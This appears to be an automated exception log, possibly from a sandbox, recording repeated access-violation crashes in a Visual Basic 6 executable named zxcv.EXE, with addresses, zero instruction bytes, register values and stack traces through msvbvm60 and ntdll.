exception.instruction_r: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
exception.symbol: zxcv+0x1902
exception.instruction: add byte ptr [eax], al
exception.module: zxcv.EXE
exception.exception_code: 0xc0000005
exception.offset: 6402
exception.address: 0x401902
registers.esp: 1637384
registers.edi: 0
registers.eax: 0
registers.ebp: 1637724
registers.edx: 1923237542
registers.ebx: 0
registers.esi: 41682900
registers.ecx: 0
1 0 0

__exception__

 stacktrace: 
EbLoadRunTime+0x1166 DllFunctionCall-0xb5 msvbvm60+0xa048 @ 0x7294a048
BASIC_CLASS_QueryInterface+0xeca EbLoadRunTime-0x13a4 msvbvm60+0x7b3e @ 0x72947b3e
ThunRTMain+0x3dd EbCreateContext-0x2e36 msvbvm60+0x3981 @ 0x72943981
ThunRTMain+0x156 EbCreateContext-0x30bd msvbvm60+0x36fa @ 0x729436fa
ThunRTMain+0x5c EbCreateContext-0x31b7 msvbvm60+0x3600 @ 0x72943600
zxcv+0x241e @ 0x40241e
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77799ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77799ea5

exception.instruction_r: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
exception.symbol: zxcv+0x1903
exception.instruction: add byte ptr [eax], al
exception.module: zxcv.EXE
exception.exception_code: 0xc0000005
exception.offset: 6403
exception.address: 0x401903
registers.esp: 1637384
registers.edi: 0
registers.eax: 0
registers.ebp: 1637724
registers.edx: 1923237542
registers.ebx: 0
registers.esi: 41682900
registers.ecx: 0
1 0 0

__exception__

 stacktrace: 
EbLoadRunTime+0x1166 DllFunctionCall-0xb5 msvbvm60+0xa048 @ 0x7294a048
BASIC_CLASS_QueryInterface+0xeca EbLoadRunTime-0x13a4 msvbvm60+0x7b3e @ 0x72947b3e
ThunRTMain+0x3dd EbCreateContext-0x2e36 msvbvm60+0x3981 @ 0x72943981
ThunRTMain+0x156 EbCreateContext-0x30bd msvbvm60+0x36fa @ 0x729436fa
ThunRTMain+0x5c EbCreateContext-0x31b7 msvbvm60+0x3600 @ 0x72943600
zxcv+0x241e @ 0x40241e
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77799ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77799ea5

exception.instruction_r: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
exception.symbol: zxcv+0x1904
exception.instruction: add byte ptr [eax], al
exception.module: zxcv.EXE
exception.exception_code: 0xc0000005
exception.offset: 6404
exception.address: 0x401904
registers.esp: 1637384
registers.edi: 0
registers.eax: 0
registers.ebp: 1637724
registers.edx: 1923237542
registers.ebx: 0
registers.esi: 41682900
registers.ecx: 0
1 0 0

__exception__

 stacktrace: 
EbLoadRunTime+0x1166 DllFunctionCall-0xb5 msvbvm60+0xa048 @ 0x7294a048
BASIC_CLASS_QueryInterface+0xeca EbLoadRunTime-0x13a4 msvbvm60+0x7b3e @ 0x72947b3e
ThunRTMain+0x3dd EbCreateContext-0x2e36 msvbvm60+0x3981 @ 0x72943981
ThunRTMain+0x156 EbCreateContext-0x30bd msvbvm60+0x36fa @ 0x729436fa
ThunRTMain+0x5c EbCreateContext-0x31b7 msvbvm60+0x3600 @ 0x72943600
zxcv+0x241e @ 0x40241e
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77799ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77799ea5

exception.instruction_r: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
exception.symbol: zxcv+0x1905
exception.instruction: add byte ptr [eax], al
exception.module: zxcv.EXE
exception.exception_code: 0xc0000005
exception.offset: 6405
exception.address: 0x401905
registers.esp: 1637384
registers.edi: 0
registers.eax: 0
registers.ebp: 1637724
registers.edx: 1923237542
registers.ebx: 0
registers.esi: 41682900
registers.ecx: 0
1 0 0

__exception__

 stacktrace: 
EbLoadRunTime+0x1166 DllFunctionCall-0xb5 msvbvm60+0xa048 @ 0x7294a048
BASIC_CLASS_QueryInterface+0xeca EbLoadRunTime-0x13a4 msvbvm60+0x7b3e @ 0x72947b3e
ThunRTMain+0x3dd EbCreateContext-0x2e36 msvbvm60+0x3981 @ 0x72943981
ThunRTMain+0x156 EbCreateContext-0x30bd msvbvm60+0x36fa @ 0x729436fa
ThunRTMain+0x5c EbCreateContext-0x31b7 msvbvm60+0x3600 @ 0x72943600
zxcv+0x241e @ 0x40241e
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77799ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77799ea5

exception.instruction_r: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
exception.symbol: zxcv+0x1906
exception.instruction: add byte ptr [eax], al
exception.module: zxcv.EXE
exception.exception_code: 0xc0000005
exception.offset: 6406
exception.address: 0x401906
registers.esp: 1637384
registers.edi: 0
registers.eax: 0
registers.ebp: 1637724
registers.edx: 1923237542
registers.ebx: 0
registers.esi: 41682900
registers.ecx: 0
1 0 0

__exception__

 stacktrace: 
EbLoadRunTime+0x1166 DllFunctionCall-0xb5 msvbvm60+0xa048 @ 0x7294a048
BASIC_CLASS_QueryInterface+0xeca EbLoadRunTime-0x13a4 msvbvm60+0x7b3e @ 0x72947b3e
ThunRTMain+0x3dd EbCreateContext-0x2e36 msvbvm60+0x3981 @ 0x72943981
ThunRTMain+0x156 EbCreateContext-0x30bd msvbvm60+0x36fa @ 0x729436fa
ThunRTMain+0x5c EbCreateContext-0x31b7 msvbvm60+0x3600 @ 0x72943600
zxcv+0x241e @ 0x40241e
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77799ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77799ea5

exception.instruction_r: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
exception.symbol: zxcv+0x1907
exception.instruction: add byte ptr [eax], al
exception.module: zxcv.EXE
exception.exception_code: 0xc0000005
exception.offset: 6407
exception.address: 0x401907
registers.esp: 1637384
registers.edi: 0
registers.eax: 0
registers.ebp: 1637724
registers.edx: 1923237542
registers.ebx: 0
registers.esi: 41682900
registers.ecx: 0
1 0 0

__exception__

 stacktrace: 
EbLoadRunTime+0x1166 DllFunctionCall-0xb5 msvbvm60+0xa048 @ 0x7294a048
BASIC_CLASS_QueryInterface+0xeca EbLoadRunTime-0x13a4 msvbvm60+0x7b3e @ 0x72947b3e
ThunRTMain+0x3dd EbCreateContext-0x2e36 msvbvm60+0x3981 @ 0x72943981
ThunRTMain+0x156 EbCreateContext-0x30bd msvbvm60+0x36fa @ 0x729436fa
ThunRTMain+0x5c EbCreateContext-0x31b7 msvbvm60+0x3600 @ 0x72943600
zxcv+0x241e @ 0x40241e
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77799ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77799ea5

exception.instruction_r: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
exception.symbol: zxcv+0x1908
exception.instruction: add byte ptr [eax], al
exception.module: zxcv.EXE
exception.exception_code: 0xc0000005
exception.offset: 6408
exception.address: 0x401908
registers.esp: 1637384
registers.edi: 0
registers.eax: 0
registers.ebp: 1637724
registers.edx: 1923237542
registers.ebx: 0
registers.esi: 41682900
registers.ecx: 0
1 0 0

__exception__

 stacktrace: 
EbLoadRunTime+0x1166 DllFunctionCall-0xb5 msvbvm60+0xa048 @ 0x7294a048
BASIC_CLASS_QueryInterface+0xeca EbLoadRunTime-0x13a4 msvbvm60+0x7b3e @ 0x72947b3e
ThunRTMain+0x3dd EbCreateContext-0x2e36 msvbvm60+0x3981 @ 0x72943981
ThunRTMain+0x156 EbCreateContext-0x30bd msvbvm60+0x36fa @ 0x729436fa
ThunRTMain+0x5c EbCreateContext-0x31b7 msvbvm60+0x3600 @ 0x72943600
zxcv+0x241e @ 0x40241e
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77799ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77799ea5

exception.instruction_r: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
exception.symbol: zxcv+0x1909
exception.instruction: add byte ptr [eax], al
exception.module: zxcv.EXE
exception.exception_code: 0xc0000005
exception.offset: 6409
exception.address: 0x401909
registers.esp: 1637384
registers.edi: 0
registers.eax: 0
registers.ebp: 1637724
registers.edx: 1923237542
registers.ebx: 0
registers.esi: 41682900
registers.ecx: 0
1 0 0

__exception__

 stacktrace: 
EbLoadRunTime+0x1166 DllFunctionCall-0xb5 msvbvm60+0xa048 @ 0x7294a048
BASIC_CLASS_QueryInterface+0xeca EbLoadRunTime-0x13a4 msvbvm60+0x7b3e @ 0x72947b3e
ThunRTMain+0x3dd EbCreateContext-0x2e36 msvbvm60+0x3981 @ 0x72943981
ThunRTMain+0x156 EbCreateContext-0x30bd msvbvm60+0x36fa @ 0x729436fa
ThunRTMain+0x5c EbCreateContext-0x31b7 msvbvm60+0x3600 @ 0x72943600
zxcv+0x241e @ 0x40241e
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77799ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77799ea5

exception.instruction_r: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
exception.symbol: zxcv+0x190a
exception.instruction: add byte ptr [eax], al
exception.module: zxcv.EXE
exception.exception_code: 0xc0000005
exception.offset: 6410
exception.address: 0x40190a
registers.esp: 1637384
registers.edi: 0
registers.eax: 0
registers.ebp: 1637724
registers.edx: 1923237542
registers.ebx: 0
registers.esi: 41682900
registers.ecx: 0
1 0 0

__exception__

 stacktrace: 
EbLoadRunTime+0x1166 DllFunctionCall-0xb5 msvbvm60+0xa048 @ 0x7294a048
BASIC_CLASS_QueryInterface+0xeca EbLoadRunTime-0x13a4 msvbvm60+0x7b3e @ 0x72947b3e
ThunRTMain+0x3dd EbCreateContext-0x2e36 msvbvm60+0x3981 @ 0x72943981
ThunRTMain+0x156 EbCreateContext-0x30bd msvbvm60+0x36fa @ 0x729436fa
ThunRTMain+0x5c EbCreateContext-0x31b7 msvbvm60+0x3600 @ 0x72943600
zxcv+0x241e @ 0x40241e
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77799ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77799ea5

exception.instruction_r: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
exception.symbol: zxcv+0x190b
exception.instruction: add byte ptr [eax], al
exception.module: zxcv.EXE
exception.exception_code: 0xc0000005
exception.offset: 6411
exception.address: 0x40190b
registers.esp: 1637384
registers.edi: 0
registers.eax: 0
registers.ebp: 1637724
registers.edx: 1923237542
registers.ebx: 0
registers.esi: 41682900
registers.ecx: 0
1 0 0

__exception__

 stacktrace: 
EbLoadRunTime+0x1166 DllFunctionCall-0xb5 msvbvm60+0xa048 @ 0x7294a048
BASIC_CLASS_QueryInterface+0xeca EbLoadRunTime-0x13a4 msvbvm60+0x7b3e @ 0x72947b3e
ThunRTMain+0x3dd EbCreateContext-0x2e36 msvbvm60+0x3981 @ 0x72943981
ThunRTMain+0x156 EbCreateContext-0x30bd msvbvm60+0x36fa @ 0x729436fa
ThunRTMain+0x5c EbCreateContext-0x31b7 msvbvm60+0x3600 @ 0x72943600
zxcv+0x241e @ 0x40241e
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77799ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77799ea5

exception.instruction_r: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
exception.symbol: zxcv+0x190c
exception.instruction: add byte ptr [eax], al
exception.module: zxcv.EXE
exception.exception_code: 0xc0000005
exception.offset: 6412
exception.address: 0x40190c
registers.esp: 1637384
registers.edi: 0
registers.eax: 0
registers.ebp: 1637724
registers.edx: 1923237542
registers.ebx: 0
registers.esi: 41682900
registers.ecx: 0
1 0 0

__exception__

 stacktrace: 
EbLoadRunTime+0x1166 DllFunctionCall-0xb5 msvbvm60+0xa048 @ 0x7294a048
BASIC_CLASS_QueryInterface+0xeca EbLoadRunTime-0x13a4 msvbvm60+0x7b3e @ 0x72947b3e
ThunRTMain+0x3dd EbCreateContext-0x2e36 msvbvm60+0x3981 @ 0x72943981
ThunRTMain+0x156 EbCreateContext-0x30bd msvbvm60+0x36fa @ 0x729436fa
ThunRTMain+0x5c EbCreateContext-0x31b7 msvbvm60+0x3600 @ 0x72943600
zxcv+0x241e @ 0x40241e
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77799ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77799ea5

exception.instruction_r: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
exception.symbol: zxcv+0x190d
exception.instruction: add byte ptr [eax], al
exception.module: zxcv.EXE
exception.exception_code: 0xc0000005
exception.offset: 6413
exception.address: 0x40190d
registers.esp: 1637384
registers.edi: 0
registers.eax: 0
registers.ebp: 1637724
registers.edx: 1923237542
registers.ebx: 0
registers.esi: 41682900
registers.ecx: 0
1 0 0

__exception__

 stacktrace: 
EbLoadRunTime+0x1166 DllFunctionCall-0xb5 msvbvm60+0xa048 @ 0x7294a048
BASIC_CLASS_QueryInterface+0xeca EbLoadRunTime-0x13a4 msvbvm60+0x7b3e @ 0x72947b3e
ThunRTMain+0x3dd EbCreateContext-0x2e36 msvbvm60+0x3981 @ 0x72943981
ThunRTMain+0x156 EbCreateContext-0x30bd msvbvm60+0x36fa @ 0x729436fa
ThunRTMain+0x5c EbCreateContext-0x31b7 msvbvm60+0x3600 @ 0x72943600
zxcv+0x241e @ 0x40241e
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77799ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77799ea5

exception.instruction_r: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
exception.symbol: zxcv+0x190e
exception.instruction: add byte ptr [eax], al
exception.module: zxcv.EXE
exception.exception_code: 0xc0000005
exception.offset: 6414
exception.address: 0x40190e
registers.esp: 1637384
registers.edi: 0
registers.eax: 0
registers.ebp: 1637724
registers.edx: 1923237542
registers.ebx: 0
registers.esi: 41682900
registers.ecx: 0
1 0 0

__exception__

 stacktrace: 
EbLoadRunTime+0x1166 DllFunctionCall-0xb5 msvbvm60+0xa048 @ 0x7294a048
BASIC_CLASS_QueryInterface+0xeca EbLoadRunTime-0x13a4 msvbvm60+0x7b3e @ 0x72947b3e
ThunRTMain+0x3dd EbCreateContext-0x2e36 msvbvm60+0x3981 @ 0x72943981
ThunRTMain+0x156 EbCreateContext-0x30bd msvbvm60+0x36fa @ 0x729436fa
ThunRTMain+0x5c EbCreateContext-0x31b7 msvbvm60+0x3600 @ 0x72943600
zxcv+0x241e @ 0x40241e
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77799ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77799ea5

exception.instruction_r: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
exception.symbol: zxcv+0x190f
exception.instruction: add byte ptr [eax], al
exception.module: zxcv.EXE
exception.exception_code: 0xc0000005
exception.offset: 6415
exception.address: 0x40190f
registers.esp: 1637384
registers.edi: 0
registers.eax: 0
registers.ebp: 1637724
registers.edx: 1923237542
registers.ebx: 0
registers.esi: 41682900
registers.ecx: 0
1 0 0

__exception__

 stacktrace: 
EbLoadRunTime+0x1166 DllFunctionCall-0xb5 msvbvm60+0xa048 @ 0x7294a048
BASIC_CLASS_QueryInterface+0xeca EbLoadRunTime-0x13a4 msvbvm60+0x7b3e @ 0x72947b3e
ThunRTMain+0x3dd EbCreateContext-0x2e36 msvbvm60+0x3981 @ 0x72943981
ThunRTMain+0x156 EbCreateContext-0x30bd msvbvm60+0x36fa @ 0x729436fa
ThunRTMain+0x5c EbCreateContext-0x31b7 msvbvm60+0x3600 @ 0x72943600
zxcv+0x241e @ 0x40241e
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77799ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77799ea5

exception.instruction_r: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
exception.symbol: zxcv+0x1910
exception.instruction: add byte ptr [eax], al
exception.module: zxcv.EXE
exception.exception_code: 0xc0000005
exception.offset: 6416
exception.address: 0x401910
registers.esp: 1637384
registers.edi: 0
registers.eax: 0
registers.ebp: 1637724
registers.edx: 1923237542
registers.ebx: 0
registers.esi: 41682900
registers.ecx: 0
1 0 0

__exception__

 stacktrace: 
EbLoadRunTime+0x1166 DllFunctionCall-0xb5 msvbvm60+0xa048 @ 0x7294a048
BASIC_CLASS_QueryInterface+0xeca EbLoadRunTime-0x13a4 msvbvm60+0x7b3e @ 0x72947b3e
ThunRTMain+0x3dd EbCreateContext-0x2e36 msvbvm60+0x3981 @ 0x72943981
ThunRTMain+0x156 EbCreateContext-0x30bd msvbvm60+0x36fa @ 0x729436fa
ThunRTMain+0x5c EbCreateContext-0x31b7 msvbvm60+0x3600 @ 0x72943600
zxcv+0x241e @ 0x40241e
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77799ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77799ea5

exception.instruction_r: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
exception.symbol: zxcv+0x1911
exception.instruction: add byte ptr [eax], al
exception.module: zxcv.EXE
exception.exception_code: 0xc0000005
exception.offset: 6417
exception.address: 0x401911
registers.esp: 1637384
registers.edi: 0
registers.eax: 0
registers.ebp: 1637724
registers.edx: 1923237542
registers.ebx: 0
registers.esi: 41682900
registers.ecx: 0
1 0 0

__exception__

 stacktrace: 
EbLoadRunTime+0x1166 DllFunctionCall-0xb5 msvbvm60+0xa048 @ 0x7294a048
BASIC_CLASS_QueryInterface+0xeca EbLoadRunTime-0x13a4 msvbvm60+0x7b3e @ 0x72947b3e
ThunRTMain+0x3dd EbCreateContext-0x2e36 msvbvm60+0x3981 @ 0x72943981
ThunRTMain+0x156 EbCreateContext-0x30bd msvbvm60+0x36fa @ 0x729436fa
ThunRTMain+0x5c EbCreateContext-0x31b7 msvbvm60+0x3600 @ 0x72943600
zxcv+0x241e @ 0x40241e
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77799ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77799ea5

exception.instruction_r: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
exception.symbol: zxcv+0x1912
exception.instruction: add byte ptr [eax], al
exception.module: zxcv.EXE
exception.exception_code: 0xc0000005
exception.offset: 6418
exception.address: 0x401912
registers.esp: 1637384
registers.edi: 0
registers.eax: 0
registers.ebp: 1637724
registers.edx: 1923237542
registers.ebx: 0
registers.esi: 41682900
registers.ecx: 0
1 0 0

__exception__

 stacktrace: 
EbLoadRunTime+0x1166 DllFunctionCall-0xb5 msvbvm60+0xa048 @ 0x7294a048
BASIC_CLASS_QueryInterface+0xeca EbLoadRunTime-0x13a4 msvbvm60+0x7b3e @ 0x72947b3e
ThunRTMain+0x3dd EbCreateContext-0x2e36 msvbvm60+0x3981 @ 0x72943981
ThunRTMain+0x156 EbCreateContext-0x30bd msvbvm60+0x36fa @ 0x729436fa
ThunRTMain+0x5c EbCreateContext-0x31b7 msvbvm60+0x3600 @ 0x72943600
zxcv+0x241e @ 0x40241e
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77799ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77799ea5

exception.instruction_r: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
exception.symbol: zxcv+0x1913
exception.instruction: add byte ptr [eax], al
exception.module: zxcv.EXE
exception.exception_code: 0xc0000005
exception.offset: 6419
exception.address: 0x401913
registers.esp: 1637384
registers.edi: 0
registers.eax: 0
registers.ebp: 1637724
registers.edx: 1923237542
registers.ebx: 0
registers.esi: 41682900
registers.ecx: 0
1 0 0

__exception__

 stacktrace: 
EbLoadRunTime+0x1166 DllFunctionCall-0xb5 msvbvm60+0xa048 @ 0x7294a048
BASIC_CLASS_QueryInterface+0xeca EbLoadRunTime-0x13a4 msvbvm60+0x7b3e @ 0x72947b3e
ThunRTMain+0x3dd EbCreateContext-0x2e36 msvbvm60+0x3981 @ 0x72943981
ThunRTMain+0x156 EbCreateContext-0x30bd msvbvm60+0x36fa @ 0x729436fa
ThunRTMain+0x5c EbCreateContext-0x31b7 msvbvm60+0x3600 @ 0x72943600
zxcv+0x241e @ 0x40241e
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77799ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77799ea5

exception.instruction_r: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
exception.symbol: zxcv+0x1914
exception.instruction: add byte ptr [eax], al
exception.module: zxcv.EXE
exception.exception_code: 0xc0000005
exception.offset: 6420
exception.address: 0x401914
registers.esp: 1637384
registers.edi: 0
registers.eax: 0
registers.ebp: 1637724
registers.edx: 1923237542
registers.ebx: 0
registers.esi: 41682900
registers.ecx: 0
1 0 0

__exception__

 stacktrace: 
EbLoadRunTime+0x1166 DllFunctionCall-0xb5 msvbvm60+0xa048 @ 0x7294a048
BASIC_CLASS_QueryInterface+0xeca EbLoadRunTime-0x13a4 msvbvm60+0x7b3e @ 0x72947b3e
ThunRTMain+0x3dd EbCreateContext-0x2e36 msvbvm60+0x3981 @ 0x72943981
ThunRTMain+0x156 EbCreateContext-0x30bd msvbvm60+0x36fa @ 0x729436fa
ThunRTMain+0x5c EbCreateContext-0x31b7 msvbvm60+0x3600 @ 0x72943600
zxcv+0x241e @ 0x40241e
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77799ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77799ea5

exception.instruction_r: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
exception.symbol: zxcv+0x1915
exception.instruction: add byte ptr [eax], al
exception.module: zxcv.EXE
exception.exception_code: 0xc0000005
exception.offset: 6421
exception.address: 0x401915
registers.esp: 1637384
registers.edi: 0
registers.eax: 0
registers.ebp: 1637724
registers.edx: 1923237542
registers.ebx: 0
registers.esi: 41682900
registers.ecx: 0
1 0 0

__exception__

 stacktrace: 
EbLoadRunTime+0x1166 DllFunctionCall-0xb5 msvbvm60+0xa048 @ 0x7294a048
BASIC_CLASS_QueryInterface+0xeca EbLoadRunTime-0x13a4 msvbvm60+0x7b3e @ 0x72947b3e
ThunRTMain+0x3dd EbCreateContext-0x2e36 msvbvm60+0x3981 @ 0x72943981
ThunRTMain+0x156 EbCreateContext-0x30bd msvbvm60+0x36fa @ 0x729436fa
ThunRTMain+0x5c EbCreateContext-0x31b7 msvbvm60+0x3600 @ 0x72943600
zxcv+0x241e @ 0x40241e
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77799ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77799ea5

exception.instruction_r: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
exception.symbol: zxcv+0x1916
exception.instruction: add byte ptr [eax], al
exception.module: zxcv.EXE
exception.exception_code: 0xc0000005
exception.offset: 6422
exception.address: 0x401916
registers.esp: 1637384
registers.edi: 0
registers.eax: 0
registers.ebp: 1637724
registers.edx: 1923237542
registers.ebx: 0
registers.esi: 41682900
registers.ecx: 0
1 0 0

__exception__

 stacktrace: 
EbLoadRunTime+0x1166 DllFunctionCall-0xb5 msvbvm60+0xa048 @ 0x7294a048
BASIC_CLASS_QueryInterface+0xeca EbLoadRunTime-0x13a4 msvbvm60+0x7b3e @ 0x72947b3e
ThunRTMain+0x3dd EbCreateContext-0x2e36 msvbvm60+0x3981 @ 0x72943981
ThunRTMain+0x156 EbCreateContext-0x30bd msvbvm60+0x36fa @ 0x729436fa
ThunRTMain+0x5c EbCreateContext-0x31b7 msvbvm60+0x3600 @ 0x72943600
zxcv+0x241e @ 0x40241e
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77799ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77799ea5

exception.instruction_r: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
exception.symbol: zxcv+0x1917
exception.instruction: add byte ptr [eax], al
exception.module: zxcv.EXE
exception.exception_code: 0xc0000005
exception.offset: 6423
exception.address: 0x401917
registers.esp: 1637384
registers.edi: 0
registers.eax: 0
registers.ebp: 1637724
registers.edx: 1923237542
registers.ebx: 0
registers.esi: 41682900
registers.ecx: 0
1 0 0

__exception__

 stacktrace: 
EbLoadRunTime+0x1166 DllFunctionCall-0xb5 msvbvm60+0xa048 @ 0x7294a048
BASIC_CLASS_QueryInterface+0xeca EbLoadRunTime-0x13a4 msvbvm60+0x7b3e @ 0x72947b3e
ThunRTMain+0x3dd EbCreateContext-0x2e36 msvbvm60+0x3981 @ 0x72943981
ThunRTMain+0x156 EbCreateContext-0x30bd msvbvm60+0x36fa @ 0x729436fa
ThunRTMain+0x5c EbCreateContext-0x31b7 msvbvm60+0x3600 @ 0x72943600
zxcv+0x241e @ 0x40241e
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77799ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77799ea5

exception.instruction_r: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
exception.symbol: zxcv+0x1918
exception.instruction: add byte ptr [eax], al
exception.module: zxcv.EXE
exception.exception_code: 0xc0000005
exception.offset: 6424
exception.address: 0x401918
registers.esp: 1637384
registers.edi: 0
registers.eax: 0
registers.ebp: 1637724
registers.edx: 1923237542
registers.ebx: 0
registers.esi: 41682900
registers.ecx: 0
1 0 0

__exception__

 stacktrace: 
EbLoadRunTime+0x1166 DllFunctionCall-0xb5 msvbvm60+0xa048 @ 0x7294a048
BASIC_CLASS_QueryInterface+0xeca EbLoadRunTime-0x13a4 msvbvm60+0x7b3e @ 0x72947b3e
ThunRTMain+0x3dd EbCreateContext-0x2e36 msvbvm60+0x3981 @ 0x72943981
ThunRTMain+0x156 EbCreateContext-0x30bd msvbvm60+0x36fa @ 0x729436fa
ThunRTMain+0x5c EbCreateContext-0x31b7 msvbvm60+0x3600 @ 0x72943600
zxcv+0x241e @ 0x40241e
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77799ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77799ea5

exception.instruction_r: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
exception.symbol: zxcv+0x1919
exception.instruction: add byte ptr [eax], al
exception.module: zxcv.EXE
exception.exception_code: 0xc0000005
exception.offset: 6425
exception.address: 0x401919
registers.esp: 1637384
registers.edi: 0
registers.eax: 0
registers.ebp: 1637724
registers.edx: 1923237542
registers.ebx: 0
registers.esi: 41682900
registers.ecx: 0
1 0 0

__exception__

 stacktrace: 
EbLoadRunTime+0x1166 DllFunctionCall-0xb5 msvbvm60+0xa048 @ 0x7294a048
BASIC_CLASS_QueryInterface+0xeca EbLoadRunTime-0x13a4 msvbvm60+0x7b3e @ 0x72947b3e
ThunRTMain+0x3dd EbCreateContext-0x2e36 msvbvm60+0x3981 @ 0x72943981
ThunRTMain+0x156 EbCreateContext-0x30bd msvbvm60+0x36fa @ 0x729436fa
ThunRTMain+0x5c EbCreateContext-0x31b7 msvbvm60+0x3600 @ 0x72943600
zxcv+0x241e @ 0x40241e
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77799ed2
